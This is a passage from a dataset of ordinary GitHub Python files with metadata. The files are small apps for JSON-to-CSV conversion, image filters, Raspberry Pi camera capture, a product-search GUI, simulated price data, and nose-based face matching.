{"api_name": "json.dumps", "line_number": 198, "usage_type": "call"}, {"api_name": "libscrape.config.db.Db", "line_number": 204, "usage_type": "call"}, {"api_name": "libscrape.config.db", "line_number": 204, "usage_type": "name"}, {"api_name": "libscrape.config.config.dbconn_prod_nba", "line_number": 204, "usage_type": "attribute"}, {"api_name": "libscrape.config.config", "line_number": 204, "usage_type": "name"}]} +{"seq_id": "17625131318", "text": "import sys\nimport json\nimport csv\n\ninput_file = sys.argv[1]\noutput_file = sys.argv[2]\noutput_fp = open(output_file, 'w', encoding='utf-8')\n\n# Create the csv writer object\ncsv_writer = csv.writer(output_fp)\n\n# Counter variable used for writing\n# headers to the CSV file\ncount = 0\n\nwith open(input_file, 'r') as fp:\n for line in fp:\n user = json.loads(line) \n if count == 0:\n # Writing headers of CSV file\n header = user.keys()\n csv_writer.writerow(header)\n count += 1\n # Writing data of CSV file\n csv_writer.writerow(user.values())\n\noutput_fp.close()\n", "repo_name": "alextricity25/azure_utility_tool", "sub_path": "util_scripts/json_to_csv.py", "file_name": "json_to_csv.py", "file_ext": "py", "file_size_in_byte": 625, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "46", "api": [{"api_name": "sys.argv", "line_number": 5, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 10, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "28717359582", "text": "import io\r\nimport base64\r\nfrom PIL import Image\r\nfrom filters import *\r\n\r\ndef get_img_download(img,filename,text):\r\n buffered = io.BytesIO()\r\n img.save(buffered,format=\"JPEG\")\r\n img_str = base64.b64encode(buffered.getvalue()).decode()\r\n href= f'{text}'\r\n return href\r\n#Set title\r\nst.title('Image Filters') \r\n\r\n#Upload Images\r\nuploaded_file = st.file_uploader(\"Choose an image file:\",type=['jpg','jpeg','png'])\r\n\r\nif uploaded_file is not None:\r\n raw_bytes = np.asarray(bytearray(uploaded_file.read()),dtype=np.uint8)\r\n img = cv2.imdecode(raw_bytes,cv2.IMREAD_COLOR)\r\n input_col,output_col = st.columns(2)\r\n \r\n with input_col:\r\n st.header(\"Original\")\r\n st.image(img,channels=\"BGR\",use_column_width=True)\r\n st.header(\"Filter Examples\")\r\n option = st.selectbox(\"Select a filter: \",('None','Black and White','Vintage','Vignette 
Effect','Pencil Sketch','Embossed','sketch_filter','cartoon_filter'))\r\n\r\n col1,col2,col3,col4 = st.columns(4)\r\n with col1:\r\n st.caption(\"Black and White\")\r\n st.image(\"bw.jpg\")\r\n with col2:\r\n st.caption(\"Cartoon Filter\")\r\n st.image(\"cartoon.jpg\")\r\n with col3:\r\n st.caption(\"Sepia Effect\")\r\n st.image(\"sepia.jpg\")\r\n with col4:\r\n st.caption(\"Pencil Sketch\")\r\n st.image('pencil.jpg')\r\n output_flag=1\r\n color = \"BGR\"\r\n\r\n #Generate filtered image based on the selected option \r\n if option=='None':\r\n output_flag=0\r\n elif option=='Black and White':\r\n output=bw_filter(img)\r\n color = 'GRAY'\r\n elif option=='Vintage':\r\n output = sepia(img)\r\n elif option=='Vignette Effect':\r\n level = st.slider(\"Level\",0,5,2)\r\n output = vignette(img,level)\r\n elif option == 'Pencil Sketch':\r\n #ksize= st.slider(\"Blur Kernel Size\",1,11,5,step=2)\r\n output = pencil_sketch(img)\r\n color= 'GRAY'\r\n elif option=='Embossed':\r\n output = embossed_edges(img) \r\n elif option=='sketch_filter':\r\n output = sketch_filter(img)\r\n color = 'GRAY'\r\n elif option=='cartoon_filter':\r\n output = cartoon_filter(img) \r\n\r\n with output_col:\r\n if output_flag==1:\r\n st.header(\"Output\")\r\n st.image(output,channels=color)\r\n if color =='BGR':\r\n result = Image.fromarray(output[:,:,::-1])\r\n else:\r\n result = Image.fromarray(output)\r\n\r\n #Display the link\r\n st.markdown(get_img_download(result,'output.png','Download'+'Output'),unsafe_allow_html=True) \r\n\r\n", "repo_name": "Iamkartikey44/Filters", "sub_path": "Image_Filter_app.py", "file_name": "Image_Filter_app.py", "file_ext": "py", "file_size_in_byte": 2683, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "io.BytesIO", "line_number": 7, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 73, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 73, "usage_type": "name"}, {"api_name": "PIL.Image.fromarray", "line_number": 75, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 75, "usage_type": "name"}]} +{"seq_id": "41099620755", "text": "import time\nimport picamera\nimport picamera.array\nfrom picamera.array import PiRGBArray\nimport cv2\nimport numpy as np\nimport zlib\nimport base64\nimport json\nimport requests\nimport imutils\nimport io\n\nip_addr = 'http://192.168.2.22:5000/predict'\nwith picamera.PiCamera() as camera:\n camera.resolution = (304,400)\n camera.framerate = 30\n camera.rotation = 270\n camera.start_preview()\n time.sleep(2)\n arr = []\n i = 0\n rawCapture = PiRGBArray(camera, size=(300, 400))\n stream = np.empty((304,400,3),dtype=np.uint8)\n for frame in camera.capture_continuous(rawCapture, format = 'rgb', use_video_port=True):\n image = frame.array\n arr.append(image)\n rawCapture.truncate(0)\n i += 1\n if i == 30:\n break\n '''\n while i < 30:\n camera.capture(stream, format='bgr')\n arr.append(stream)\n\n with picamera.array.PiRGBArray(camera,size=camera.resolution) as stream:\n camera.capture(stream, format='bgr')\n # At this point the image is available as stream.array\n #print(stream.array.shape)\n image = stream.array\n image = imutils.resize(image,width=400)#print(image)\n arr.append(image)\n '''\n print(arr[0].shape)\n frames = np.array(arr)\n print(frames.shape)\n #frames = np.ndarray(shape=(30,300,400,3),dtype=np.uint8, buffer = arr)\n data = zlib.compress(frames)\n 
data = base64.b64encode(data)\n data_send = data\n data2 = base64.b64decode(data)\n data2 = zlib.decompress(data2)\n fdata = np.frombuffer(data2, dtype=np.uint8)\n r = requests.post(ip_addr, data={'imgb64' : data_send})\n n = r.json()\n print(type(r))\n result = json.loads(n)#n\n print(result[\"message\"])", "repo_name": "MorganYeung/Symsense", "sub_path": "cam_test_server.py", "file_name": "cam_test_server.py", "file_ext": "py", "file_size_in_byte": 1749, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "46", "api": [{"api_name": "picamera.PiCamera", "line_number": 15, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 20, "usage_type": "call"}, {"api_name": "picamera.array.PiRGBArray", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "zlib.compress", "line_number": 49, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 50, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 52, "usage_type": "call"}, {"api_name": "zlib.decompress", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 54, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 55, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "13096285055", "text": "import customtkinter\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\nimport database\r\n\r\napp = customtkinter.CTk()\r\napp.title('Search Products')\r\napp.geometry('700x600')\r\napp.config(bg='plum')\r\napp.resizable(False,False)\r\n\r\nfont1 = ('Arial',30,'bold')\r\nfont2 = ('Arial',20,'bold')\r\n\r\ndef search_product():\r\n selection = variable3.get()\r\n selection2 = variable.get()\r\n if (selection != 'Select'):\r\n row = database.search_product_id(selection)\r\n name_result_label.configure(text=row[1])\r\n catogry_result_label.configure(text=row[2])\r\n stock_result_label.configure(text=row[3])\r\n price_result_label.configure(text=row[5])\r\n elif ( selection2 != 'Select'):\r\n row = database.search_product_name(selection2)\r\n name_result_label.configure(text=row[1])\r\n catogry_result_label.configure(text=row[2])\r\n stock_result_label.configure(text=row[3])\r\n price_result_label.configure(text=row[5])\r\n \r\n \r\n else:\r\n messagebox.showerror('Error','Select Id')\r\n \r\n\r\ndef insert_item_options():\r\n item = database.fetch_all_item()\r\n item_options.configure(values=item)\r\n\r\ndef insert_ids_options():\r\n ids = database.fetch_all_ids()\r\n ids_options.configure(values=ids)\r\n \r\n\r\ntitle_label = customtkinter.CTkLabel(app,font = font1,text='Search Products',bg_color='purple',text_color='black')\r\ntitle_label.place(x=250,y=15)\r\n\r\nname_label = customtkinter.CTkLabel(app,font = font2,text='Search by name:',bg_color='purple',text_color='black')\r\nname_label.place(x=50,y=100)\r\nvariable = StringVar()\r\n\r\nitem_options = customtkinter.CTkComboBox(app,font=font2,text_color='black',fg_color='white',dropdown_hover_color='purple',button_color='white',button_hover_color='purple',border_color='purple',width=150,variable=variable,state='readonly')\r\nitem_options.set('Select')\r\nitem_options.place(x=200,y=100)\r\n\r\nsearch_label = 
customtkinter.CTkLabel(app,font = font2,text='Search by Id:',bg_color='purple',text_color='black')\r\nsearch_label.place(x=50,y=130)\r\nvariable3 = StringVar()\r\n\r\nids_options = customtkinter.CTkComboBox(app,font=font2,text_color='black',fg_color='white',dropdown_hover_color='purple',button_color='white',button_hover_color='purple',border_color='purple',width=150,variable=variable3,state='readonly')\r\nids_options.set('Select')\r\nids_options.place(x=200,y=130)\r\n\r\nsearch_button = customtkinter.CTkButton(app,command=search_product,font=font2,text='Search',text_color='black',fg_color='purple',hover_color='plum',bg_color='black',border_color='black',cursor='hand2',corner_radius=7,width=100)\r\nsearch_button.place(x=360,y=100)\r\n\r\nframe = customtkinter.CTkFrame(app,bg_color='#dda0dd',fg_color='black',corner_radius=10,border_width=5,border_color='purple',width=500,height=300)\r\nframe.place(x=60,y=180)\r\n\r\nname_label = customtkinter.CTkLabel(frame,font = font2,text='Name:',bg_color='purple',text_color='black')\r\nname_label.place(x=20,y=50)\r\n\r\ncatogry_label = customtkinter.CTkLabel(frame,font = font2,text='Catogry:',bg_color='purple',text_color='black')\r\ncatogry_label.place(x=230,y=50)\r\n\r\nstock_label = customtkinter.CTkLabel(frame,font = font2,text='stocks:',bg_color='purple',text_color='black')\r\nstock_label.place(x=20,y=200)\r\n\r\nprice_label = customtkinter.CTkLabel(frame,font = font2,text='Price:',bg_color='purple',text_color='black')\r\nprice_label.place(x=230,y=200)\r\n\r\nname_result_label = customtkinter.CTkLabel(frame,font = font2,text='',bg_color='purple',text_color='black')\r\nname_result_label.place(x=100,y=50)\r\n\r\ncatogry_result_label = customtkinter.CTkLabel(frame,font = font2,text='',bg_color='purple',text_color='black')\r\ncatogry_result_label.place(x=330,y=50)\r\n\r\nstock_result_label = customtkinter.CTkLabel(frame,font = font2,text='',bg_color='purple',text_color='black')\r\nstock_result_label.place(x=100,y=200)\r\n\r\nprice_result_label = customtkinter.CTkLabel(frame,font = font2,text='',bg_color='purple',text_color='black')\r\nprice_result_label.place(x=310,y=200)\r\n\r\ninsert_ids_options()\r\ninsert_item_options()\r\napp.mainloop()", "repo_name": "saharahsan/gui-python", "sub_path": "search.py", "file_name": "search.py", "file_ext": "py", "file_size_in_byte": 4056, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "46", "api": [{"api_name": "customtkinter.CTk", "line_number": 6, "usage_type": "call"}, {"api_name": "database.search_product_id", "line_number": 19, "usage_type": "call"}, {"api_name": "database.search_product_name", "line_number": 25, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 33, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 33, "usage_type": "name"}, {"api_name": "database.fetch_all_item", "line_number": 37, "usage_type": "call"}, {"api_name": "database.fetch_all_ids", "line_number": 41, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 45, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 48, "usage_type": "call"}, {"api_name": "customtkinter.CTkComboBox", "line_number": 52, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 56, "usage_type": "call"}, {"api_name": "customtkinter.CTkComboBox", "line_number": 60, "usage_type": "call"}, {"api_name": "customtkinter.CTkButton", "line_number": 64, "usage_type": "call"}, {"api_name": 
"customtkinter.CTkFrame", "line_number": 67, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 70, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 73, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 76, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 79, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 82, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 85, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 88, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 91, "usage_type": "call"}]} +{"seq_id": "16705853403", "text": "import pandas as pd\nimport random as rd\nfrom pymongo import MongoClient\nfrom datetime import datetime as dt, timedelta as td\n\nclass Produto:\n\n last_price: float\n value: str = 'R$ {:.2f}'\n \n def __init__(\n self,\n original: float\n ) -> None:\n self.original_price = original\n self.min_price = int(original * 0.4)\n self.last_price = original\n\n\n def price(self) -> str:\n\n op = rd.randrange(0, 3)\n \n if not op:\n return self.value.format(self.last_price)\n \n percent = rd.randrange(5, 96) if op == 1 else rd.randrange(105, 176)\n self.last_price = self.last_price * ( percent / 100 )\n\n if self.last_price > self.original_price:\n self.last_price = self.original_price\n\n if self.last_price < self.min_price:\n self.last_price = self.min_price\n\n return self.value.format(self.last_price)\n\nclass iPhone(Produto):\n\n name: str = \"iPhone 11 64GB\"\n\nclass Xbox(Produto):\n\n name: str = \"Xbox Series S\"\n\nclass Nintendo(Produto):\n\n name: str = 'Nintendo Switch'\n\nclass TV(Produto):\n\n name: str = 'TV Samsung T5300 43\"'\n\n\n# Valores KB\nxboxKB = Xbox(2750)\ntvKB = TV(3000)\niphoneKB = iPhone(6150)\nnintendoKB = Nintendo(2000)\n\n# Valores PC\nxboxPC = Xbox(2500)\ntvPC = TV(3000)\niphonePC = iPhone(6650)\nnintendoPC = Nintendo(2300)\n\n# Valores NE\nxboxNE = Xbox(2750)\ntvNE = TV(1500)\niphoneNE = iPhone(7500)\nnintendoNE = Nintendo(2500)\n\n# Config\ndata = dt(2022, 4, 1, 0, 0, 0)\n\nclient = MongoClient()\ndb = client[\"precos\"]\nprecos = db[\"tabela_precos\"]\n\ntarget = dt(2022, 5, 15, 23, 0, 0)\n\nvalues = []\n\nwhile data != target:\n\n data_format = data.strftime(\"%Y-%m-%d %H:%M:00\")\n\n modelXB = {\n \"Nome\": xboxKB.name,\n \"Data\": data_format,\n \"ValorKB\": xboxKB.price(),\n \"ValorPC\": xboxPC.price(),\n \"ValorNE\": xboxNE.price(),\n }\n\n modelIP = {\n \"Nome\": iphoneKB.name,\n \"Data\": data_format,\n \"ValorKB\": iphoneKB.price(),\n \"ValorPC\": iphonePC.price(),\n \"ValorNE\": iphoneNE.price(),\n }\n\n modelTV = {\n \"Nome\": tvKB.name,\n \"Data\": data_format,\n \"ValorKB\": tvKB.price(),\n \"ValorPC\": tvPC.price(),\n \"ValorNE\": tvNE.price(),\n }\n\n modelNT = {\n \"Nome\": nintendoKB.name,\n \"Data\": data_format,\n \"ValorKB\": nintendoKB.price(),\n \"ValorPC\": nintendoPC.price(),\n \"ValorNE\": nintendoNE.price(),\n }\n\n values.append(modelXB)\n values.append(modelIP)\n values.append(modelTV)\n values.append(modelNT)\n \n data = data + td(hours=1)\n\n\nprecos.insert_many(values)\n\ndf = pd.DataFrame(values)\ndf.to_csv(\"./dados.csv\", sep=',', encoding='utf-8', index=False)", "repo_name": "AdrianoNDL/PROJETO-TI", "sub_path": "dados.py", "file_name": "dados.py", "file_ext": "py", "file_size_in_byte": 2731, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", 
"pt": "46", "api": [{"api_name": "random.randrange", "line_number": 22, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 74, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 76, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 80, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 130, "usage_type": "call"}]} +{"seq_id": "16476740804", "text": "from flask import Flask, render_template, request\nimport keras\nfrom keras.layers import Input, Conv2D, Lambda, Dense, Flatten,MaxPooling2D,Activation, Dropout\nfrom keras.models import Model, Sequential\nfrom keras.regularizers import l2\nfrom keras import backend as K\nfrom tensorflow.keras.optimizers import Adam\nfrom skimage.io import imshow\n# import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport random\nfrom keras.preprocessing import image\nfrom tensorflow.keras.preprocessing.image import img_to_array\nimport tensorflow as tf\n#from matplotlib import pyplot as plt\nfrom imutils import face_utils\nimport numpy as np\n# import argparse\nimport imutils\nimport dlib\nimport cv2\n# from google.colab.patches import cv2_imshow\nfrom keras.preprocessing import image\nfrom PIL import Image\n\napp = Flask(__name__)\n\ndef initialize_weights(shape, dtype=None):\n \"\"\"\n The paper, http://www.cs.utoronto.ca/~gkoch/files/msc-thesis.pdf\n suggests to initialize CNN layer weights with mean as 0.0 and standard deviation of 0.01\n \"\"\"\n return np.random.normal(loc = 0.0, scale = 1e-2, size = shape)\n\ndef initialize_bias(shape, dtype=None):\n \"\"\"\n The paper, http://www.cs.utoronto.ca/~gkoch/files/msc-thesis.pdf\n suggests to initialize CNN layer bias with mean as 0.5 and standard deviation of 0.01\n \"\"\"\n return np.random.normal(loc = 0.5, scale = 1e-2, size = shape)\n\ndef get_siamese_model(input_shape):\n \"\"\"\n Model architecture based on the one provided in: http://www.cs.utoronto.ca/~gkoch/files/msc-thesis.pdf\n \"\"\"\n \n # Define the tensors for the two input images\n left_input = Input(input_shape)\n right_input = Input(input_shape)\n \n # Convolutional Neural Network\n model = Sequential()\n model.add(Conv2D(64, (10,10), activation='relu', input_shape=input_shape,\n kernel_initializer=initialize_weights, kernel_regularizer=l2(2e-4)))\n model.add(MaxPooling2D())\n model.add(Conv2D(128, (7,7), activation='relu',\n kernel_initializer=initialize_weights,\n bias_initializer=initialize_bias, kernel_regularizer=l2(2e-4)))\n model.add(MaxPooling2D())\n model.add(Conv2D(128, (4,4), activation='relu', kernel_initializer=initialize_weights,\n bias_initializer=initialize_bias, kernel_regularizer=l2(2e-4)))\n model.add(MaxPooling2D())\n model.add(Conv2D(256, (4,4), activation='relu', kernel_initializer=initialize_weights,\n bias_initializer=initialize_bias, kernel_regularizer=l2(2e-4)))\n model.add(Flatten())\n model.add(Dense(4096, activation='sigmoid',\n kernel_regularizer=l2(1e-3),\n kernel_initializer=initialize_weights,bias_initializer=initialize_bias))\n \n # Generate the encodings (feature vectors) for the two images\n encoded_l = model(left_input)\n encoded_r = model(right_input)\n \n # Add a customized layer to compute the absolute difference between the encodings\n L1_layer = Lambda(lambda tensors:K.abs(tensors[0] - tensors[1]))\n L1_distance = L1_layer([encoded_l, 
encoded_r])\n \n # Add a dense layer with a sigmoid unit to generate the similarity score\n prediction = Dense(1,activation='sigmoid',bias_initializer=initialize_bias)(L1_distance)\n \n # Connect the inputs with the outputs\n siamese_net = Model(inputs=[left_input,right_input],outputs=prediction)\n \n # return the model\n return siamese_net\n\ndef crop_center(pil_img, crop_width, crop_height):\n img_width, img_height = pil_img.size\n return pil_img.crop(((img_width - crop_width) // 2,\n (img_height - crop_height) // 2,\n (img_width + crop_width) // 2,\n (img_height + crop_height) // 2))\n\ndef crop_max_square(pil_img):\n return crop_center(pil_img, min(pil_img.size), min(pil_img.size))\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n@app.route(\"/predict\", methods=[\"POST\"])\ndef predict():\n # Get the uploaded images\n image1 = request.files[\"image1\"]\n image2 = request.files[\"image2\"]\n # Decode the uploaded files into OpenCV BGR arrays; the raw FileStorage\n # objects expose bytes, not pixel arrays, and have no .shape attribute\n image1 = cv2.imdecode(np.frombuffer(image1.read(), np.uint8), cv2.IMREAD_COLOR)\n image2 = cv2.imdecode(np.frombuffer(image2.read(), np.uint8), cv2.IMREAD_COLOR)\n\n # Perform facial recognition prediction....................................................\n model = get_siamese_model((80, 80, 3))\n optimizer = Adam(learning_rate = 0.00006)\n model.compile(loss=\"binary_crossentropy\",optimizer=optimizer)\n # model.load_weights('/content/drive/My Drive/Colab Notebooks/capstone project/Nose_model/siamese_network.h5')\n model.load_weights('siamese_network.h5')\n # initialize dlib's face detector (HOG-based) and then create\n # the facial landmark predictor\n detector = dlib.get_frontal_face_detector()\n predictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat')\n # predictor = dlib.shape_predictor(args[\"shape_predictor\"])\n \n #First image processing.....\n height, width, channels = image1.shape\n if height < 500 or width < 500:\n return render_template(\"index.html\", prediction='Size of image 1 should be at least 500x500')\n \n # load the input image, resize it, and convert it to grayscale\n # image = imutils.resize(image, width=500)\n height, width, channels = image1.shape\n gray = cv2.cvtColor(image1, cv2.COLOR_BGR2GRAY)\n\n # detect faces in the grayscale image\n rects = detector(gray, 1)\n\n # loop over the face detections\n for (i, rect) in enumerate(rects):\n # determine the facial landmarks for the face region, then\n # convert the facial landmark (x, y)-coordinates to a NumPy\n # array\n shape = predictor(gray, rect)\n shape = face_utils.shape_to_np(shape)\n\n x_min,y_min = np.amin(shape[27:36], axis = 0)\n x_max,y_max = np.amax(shape[27:36], axis = 0)\n\n offsetX = (y_max-y_min - (x_max-x_min))/2\n offsetX = int(offsetX)\n\n img = cv2.cvtColor(image1[y_min:y_max, x_min-offsetX:x_max+offsetX], cv2.COLOR_BGR2RGB)\n img = Image.fromarray(img)\n img = crop_max_square(img)\n img = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)\n img = imutils.resize(img, width=80, height=80)\n # cv2_imshow(img)\n\n img1 = img\n \n #Second image processing.....\n height, width, channels = image2.shape\n if height < 500 or width < 500:\n return render_template(\"index.html\", prediction='Size of image 2 should be at least 500x500')\n # load the input image, resize it, and convert it to grayscale\n # image = imutils.resize(image, width=500)\n height, width, channels = image2.shape\n gray = cv2.cvtColor(image2, cv2.COLOR_BGR2GRAY)\n\n # detect faces in the grayscale image\n rects = detector(gray, 1)\n\n # loop over the face detections\n for (i, rect) in enumerate(rects):\n # determine the facial landmarks for the face region, then\n # convert the facial landmark (x, y)-coordinates to a NumPy\n # array\n shape = predictor(gray, rect)\n 
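# face_utils.shape_to_np converts dlib's full_object_detection into a (68, 2)\n # NumPy array of (x, y) coordinates; indices 27-35 of the 68-point scheme\n # cover the nose, which is why the slices below take shape[27:36].\n 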
shape = face_utils.shape_to_np(shape)\n\n x_min,y_min = np.amin(shape[27:36], axis = 0)\n x_max,y_max = np.amax(shape[27:36], axis = 0)\n\n offsetX = (y_max-y_min - (x_max-x_min))/2\n offsetX = int(offsetX)\n\n img = cv2.cvtColor(image2[y_min:y_max, x_min-offsetX:x_max+offsetX], cv2.COLOR_BGR2RGB)\n img = Image.fromarray(img)\n img = crop_max_square(img)\n img = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)\n img = imutils.resize(img, width=80, height=80)\n # cv2_imshow(img)\n\n img2 = img\n \n #Final Prediction.....\n img1 = np.expand_dims(img1, axis=0)\n img1.shape\n img2 = np.expand_dims(img2, axis=0)\n img2.shape\n predTest = (model.predict([img1, img2]) > 0.5).astype(\"int32\")\n if predTest==0:\n return render_template(\"index.html\", prediction='Images are not of same person')\n if predTest==1:\n return render_template(\"index.html\", prediction='Images are of same person')\n \n \n\nif __name__ == \"__main__\":\n app.run(debug=True)\n", "repo_name": "ShivamTarte/flask-test", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 7902, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "46", "api": [{"api_name": "flask.Flask", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 34, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 41, "usage_type": "attribute"}, {"api_name": "keras.layers.Input", "line_number": 49, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 50, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 53, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 54, "usage_type": "call"}, {"api_name": "keras.regularizers.l2", "line_number": 55, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 56, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 57, "usage_type": "call"}, {"api_name": "keras.regularizers.l2", "line_number": 59, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 60, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 61, "usage_type": "call"}, {"api_name": "keras.regularizers.l2", "line_number": 62, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 63, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 64, "usage_type": "call"}, {"api_name": "keras.regularizers.l2", "line_number": 65, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 66, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 67, "usage_type": "call"}, {"api_name": "keras.regularizers.l2", "line_number": 68, "usage_type": "call"}, {"api_name": "keras.layers.Lambda", "line_number": 76, "usage_type": "call"}, {"api_name": "keras.backend.abs", "line_number": 76, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 76, "usage_type": "name"}, {"api_name": "keras.layers.Dense", "line_number": 80, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 105, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 105, "usage_type": 
"name"}, {"api_name": "flask.request.files", "line_number": 106, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 106, "usage_type": "name"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 110, "usage_type": "call"}, {"api_name": "dlib.get_frontal_face_detector", "line_number": 116, "usage_type": "call"}, {"api_name": "dlib.shape_predictor", "line_number": 117, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 123, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 128, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 128, "usage_type": "attribute"}, {"api_name": "imutils.face_utils.shape_to_np", "line_number": 139, "usage_type": "call"}, {"api_name": "imutils.face_utils", "line_number": 139, "usage_type": "name"}, {"api_name": "numpy.amin", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 142, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 147, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 147, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 148, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 148, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 150, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 150, "usage_type": "attribute"}, {"api_name": "imutils.resize", "line_number": 151, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 159, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 163, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 163, "usage_type": "attribute"}, {"api_name": "imutils.face_utils.shape_to_np", "line_number": 174, "usage_type": "call"}, {"api_name": "imutils.face_utils", "line_number": 174, "usage_type": "name"}, {"api_name": "numpy.amin", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 177, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 182, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 182, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 183, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 183, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 185, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 185, "usage_type": "attribute"}, {"api_name": "imutils.resize", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 194, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 198, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 200, "usage_type": "call"}]} +{"seq_id": "44015126144", "text": "import sys\nimport os\nimport numpy as np\nfrom model import *\nfrom datasets import get_vocabulary, prepare_pair_data\nimport cPickle as pickle\nimport shutil\n\n\nencoder_hidden_size = 512\nn_encoder_layers = 2\ndecoder_hidden_size = 512\nembed_size = 128\nvocabulary_size = 20000\nlearning_rate = 0.0001\nn_steps = 1500000\ngrad_clip = 10.0\n\nsave_every = 